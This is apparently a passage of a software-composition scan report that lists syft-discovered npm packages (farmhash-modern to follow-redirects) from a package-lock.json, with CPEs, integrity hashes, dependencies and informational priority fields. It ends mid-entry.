/package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:farmhash-modern:farmhash-modern:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:farmhash-modern:farmhash_modern:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:farmhash_modern:farmhash-modern:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:farmhash_modern:farmhash_modern:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:farmhash:farmhash-modern:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:farmhash:farmhash_modern:1.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/farmhash-modern@1.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/farmhash-modern/-/farmhash-modern-1.1.0.tgz integrity: sha512-6ypT4XfgqJk/F3Yuv4SX26I3doUjt0GTG4a+JgWxXQpxXzTBq8fPUeGHfcYMMDPHJHm3yPOSjaeBwBGAHWXCdA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7b51b4692c5fdf0a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: fast-deep-equal 2.0.1' title: fast-deep-equal 2.0.1 description: 'Package discovered: fast-deep-equal 2.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 18c3431d6798a7cd name: fast-deep-equal version: 2.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:fast-deep-equal:fast-deep-equal:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast-deep-equal:fast_deep_equal:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_deep_equal:fast-deep-equal:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_deep_equal:fast_deep_equal:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast-deep:fast-deep-equal:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast-deep:fast_deep_equal:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_deep:fast-deep-equal:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_deep:fast_deep_equal:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast:fast-deep-equal:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast:fast_deep_equal:2.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/fast-deep-equal@2.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-2.0.1.tgz integrity: sha512-bCK/2Z4zLidyB4ReuIsvALH6w31YfAQDmXMqMx6FyfHqvBxtjC0eRumeSu4Bs3XtXwpyIywtSTrVT99BxY1f9w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: df8671df2c12ad48 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: fast-deep-equal 3.1.3' title: fast-deep-equal 3.1.3 description: 'Package discovered: fast-deep-equal 3.1.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 5dcd27213b9411fd name: fast-deep-equal version: 3.1.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:fast-deep-equal:fast-deep-equal:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast-deep-equal:fast_deep_equal:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_deep_equal:fast-deep-equal:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_deep_equal:fast_deep_equal:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast-deep:fast-deep-equal:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast-deep:fast_deep_equal:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_deep:fast-deep-equal:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_deep:fast_deep_equal:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast:fast-deep-equal:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast:fast_deep_equal:3.1.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/fast-deep-equal@3.1.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz integrity: sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f137c47d21c65abc ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: fast-equals 5.4.0' title: fast-equals 5.4.0 description: 'Package discovered: fast-equals 5.4.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: fea7469744f21377 name: fast-equals version: 5.4.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:fast-equals:fast-equals:5.4.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast-equals:fast_equals:5.4.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_equals:fast-equals:5.4.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_equals:fast_equals:5.4.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast:fast-equals:5.4.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast:fast_equals:5.4.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/fast-equals@5.4.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/fast-equals/-/fast-equals-5.4.0.tgz integrity: sha512-jt2DW/aNFNwke7AUd+Z+e6pz39KO5rzdbbFCg2sGafS4mk13MI7Z8O5z9cADNn5lhGODIgLwug6TZO2ctf7kcw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c3d9f6c04405728e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: fast-glob 3.3.3' title: fast-glob 3.3.3 description: 'Package discovered: fast-glob 3.3.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 756085ffd4026f3c name: fast-glob version: 3.3.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:fast-glob:fast-glob:3.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast-glob:fast_glob:3.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_glob:fast-glob:3.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_glob:fast_glob:3.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast:fast-glob:3.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast:fast_glob:3.3.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/fast-glob@3.3.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/fast-glob/-/fast-glob-3.3.3.tgz integrity: sha512-7MptL8U0cqcFdzIzwOTHoilX9x5BrNqye7Z/LuC7kCMRio1EMSyqRK3BEAUD7sXRq4iT4AzTVuZdhgQ2TCvYLg== dependencies: '@nodelib/fs.stat': ^2.0.2 '@nodelib/fs.walk': ^1.2.3 glob-parent: ^5.1.2 merge2: ^1.3.0 micromatch: ^4.0.8 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c31f574684b9f10b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: fast-xml-builder 1.1.5' title: fast-xml-builder 1.1.5 description: 'Package discovered: fast-xml-builder 1.1.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b198a6d2f9894f68 name: fast-xml-builder version: 1.1.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:fast-xml-builder:fast-xml-builder:1.1.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast-xml-builder:fast_xml_builder:1.1.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_xml_builder:fast-xml-builder:1.1.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_xml_builder:fast_xml_builder:1.1.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast-xml:fast-xml-builder:1.1.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast-xml:fast_xml_builder:1.1.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_xml:fast-xml-builder:1.1.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast_xml:fast_xml_builder:1.1.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast:fast-xml-builder:1.1.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fast:fast_xml_builder:1.1.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/fast-xml-builder@1.1.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.5.tgz integrity: sha512-4TJn/8FKLeslLAH3dnohXqE3QSoxkhvaMzepOIZytwJXZO69Bfz0HBdDHzOTOon6G59Zrk6VQ2bEiv1t61rfkA== dependencies: path-expression-matcher: ^1.1.3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b4dd20a63e4dfb25 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: fast-xml-parser 5.7.2' title: fast-xml-parser 5.7.2 description: 'Package discovered: fast-xml-parser 5.7.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 03ef00f42507be2f name: fast-xml-parser version: 5.7.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:naturalintelligence:fast-xml-parser:5.7.2:*:*:*:*:*:*:* source: nvd-cpe-dictionary purl: pkg:npm/fast-xml-parser@5.7.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.7.2.tgz integrity: sha512-P7oW7tLbYnhOLQk/Gv7cZgzgMPP/XN03K02/Jy6Y/NHzyIAIpxuZIM/YqAkfiXFPxA2CTm7NtCijK9EDu09u2w== dependencies: '@nodable/entities': ^2.1.0 fast-xml-builder: ^1.1.5 path-expression-matcher: ^1.5.0 strnum: ^2.2.3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0cdc7a6cc314eb50 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: fastq 1.20.1' title: fastq 1.20.1 description: 'Package discovered: fastq 1.20.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 32597e8bd5ad1e0f name: fastq version: 1.20.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:fastq:fastq:1.20.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/fastq@1.20.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/fastq/-/fastq-1.20.1.tgz integrity: sha512-GGToxJ/w1x32s/D2EKND7kTil4n8OVk/9mycTc4VDza13lOvpUZTGX3mFSCtV9ksdGBVzvsyAVLM6mHFThxXxw== dependencies: reusify: ^1.0.4 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 98eadb7c6959fda9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: faye-websocket 0.11.4' title: faye-websocket 0.11.4 description: 'Package discovered: faye-websocket 0.11.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 5a9d4671ef023c43 name: faye-websocket version: 0.11.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:faye-websocket:faye-websocket:0.11.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:faye-websocket:faye_websocket:0.11.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:faye_websocket:faye-websocket:0.11.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:faye_websocket:faye_websocket:0.11.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:faye:faye-websocket:0.11.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:faye:faye_websocket:0.11.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/faye-websocket@0.11.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/faye-websocket/-/faye-websocket-0.11.4.tgz integrity: sha512-CzbClwlXAuiRQAlUyfqPgvPoNKTckTPGfwZV4ZdAhVcP2lh9KUxJg2b5GkE7XbjKQ3YJnQ9z6D9ntLAlB+tP8g== dependencies: websocket-driver: '>=0.5.1' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 64d0cebc4ed83cee ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: fdir 6.5.0' title: fdir 6.5.0 description: 'Package discovered: fdir 6.5.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4d9064c107e69a4e name: fdir version: 6.5.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:fdir:fdir:6.5.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/fdir@6.5.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz integrity: sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7b56dfc5637424f2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: fflate 0.8.2' title: fflate 0.8.2 description: 'Package discovered: fflate 0.8.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ad8b63b86fd3ee37 name: fflate version: 0.8.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:fflate:fflate:0.8.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/fflate@0.8.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/fflate/-/fflate-0.8.2.tgz integrity: sha512-cPJU47OaAoCbg0pBvzsgpTPhmhqI5eJjh/JIu8tPj5q+T7iLvW/JAYUqmE7KOB4R1ZyEhzBaIQpQpardBF5z8A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d2d1a258c47b4e8a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: fill-range 7.1.1' title: fill-range 7.1.1 description: 'Package discovered: fill-range 7.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: adf22420cd3811ab name: fill-range version: 7.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:fill-range:fill-range:7.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fill-range:fill_range:7.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fill_range:fill-range:7.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fill_range:fill_range:7.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fill:fill-range:7.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:fill:fill_range:7.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/fill-range@7.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz integrity: sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg== dependencies: to-regex-range: ^5.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0d132a7f95881c19 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: finalhandler 1.3.2' title: finalhandler 1.3.2 description: 'Package discovered: finalhandler 1.3.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 257d2278606af57b name: finalhandler version: 1.3.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:finalhandler:finalhandler:1.3.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/finalhandler@1.3.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/finalhandler/-/finalhandler-1.3.2.tgz integrity: sha512-aA4RyPcd3badbdABGDuTXCMTtOneUCAYH/gxoYRTZlIJdF0YPWuGqiAsIrhNnnqdXGswYk6dGujem4w80UJFhg== dependencies: debug: 2.6.9 encodeurl: ~2.0.0 escape-html: ~1.0.3 on-finished: ~2.4.1 parseurl: ~1.3.3 statuses: ~2.0.2 unpipe: ~1.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a37c455231ce6925 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: find-up 4.1.0' title: find-up 4.1.0 description: 'Package discovered: find-up 4.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: dde504db4cea8c91 name: find-up version: 4.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:find-up:find-up:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:find-up:find_up:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:find_up:find-up:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:find_up:find_up:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:find:find-up:4.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:find:find_up:4.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/find-up@4.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz integrity: sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw== dependencies: locate-path: ^5.0.0 path-exists: ^4.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6285de3b3f3c2477 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: firebase-admin 12.7.0' title: firebase-admin 12.7.0 description: 'Package discovered: firebase-admin 12.7.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 01aea657af389bb4 name: firebase-admin version: 12.7.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:firebase-admin:firebase-admin:12.7.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:firebase-admin:firebase_admin:12.7.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:firebase_admin:firebase-admin:12.7.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:firebase_admin:firebase_admin:12.7.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:firebase:firebase-admin:12.7.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:firebase:firebase_admin:12.7.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/firebase-admin@12.7.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/firebase-admin/-/firebase-admin-12.7.0.tgz integrity: sha512-raFIrOyTqREbyXsNkSHyciQLfv8AUZazehPaQS1lZBSCDYW74FYXU0nQZa3qHI4K+hawohlDbywZ4+qce9YNxA== dependencies: '@fastify/busboy': ^3.0.0 '@firebase/database-compat': 1.0.8 '@firebase/database-types': 1.0.5 '@types/node': ^22.0.1 farmhash-modern: ^1.1.0 jsonwebtoken: ^9.0.0 jwks-rsa: ^3.1.0 node-forge: ^1.3.1 uuid: ^10.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a972164b3d990123 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: follow-redirects 1.16.0' title: follow-redirects 1.16.0 description: 'Package discovered: follow-redirects 1.16.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a8847fd98501e6bd name: follow-redirects version: 1.16.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:follow-redirects:follow_redirects:1.16.0:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/follow-redirects@1.16.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.16.0.tgz integrity: 